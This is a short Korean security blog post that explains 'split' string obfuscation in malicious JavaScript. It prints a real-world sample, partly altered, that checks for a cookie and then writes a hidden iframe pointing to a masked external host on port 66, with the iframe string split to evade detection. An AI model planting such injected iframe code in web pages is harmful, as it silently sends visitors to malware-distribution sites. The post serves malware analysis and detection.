말 그대로 조각내어 난독화 하는 형태 입니다.
split 기법에도 다양한 형태가 있는데, 아래와 같이 한개의 변수의 값을 조각내는 경우도 있고
각각의 변수를 선언하여 변수마다 조각난 문자열을 보관하여 변수의 합으로 완성된 문자열을 이용하는 경우도 있습니다.
function baiduuu(){ var Then = new Date() Then.setTime(Then.getTime() + 12*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookvie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else { var visxa="xx9"; var fire="<ifra"+"me sr"; document.cookie = "Cookvie1=duis;expires="+ Then.toGMTString() document.write("<div style=\'dispaly:none;\' >"); document.write(fire+"c=http:\/\/***.***.com:66\/1\/gday.htm wid"+"th=100 hei"+"ght=0><\/ifr"+"ame>"); document.write("</div>"); } }baiduuu();
* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.
반응형
'Information Security > Malware' 카테고리의 다른 글
Gondad EK 최근 추세 (1) | 2013.06.12 |
---|---|
Hexdecimal Obfuscation #01 (0) | 2013.06.10 |
JSMin Javascript Compressor (0) | 2013.06.07 |
Decimal Obfuscated (0) | 2013.05.21 |
악성코드 스트링값 (0) | 2013.05.09 |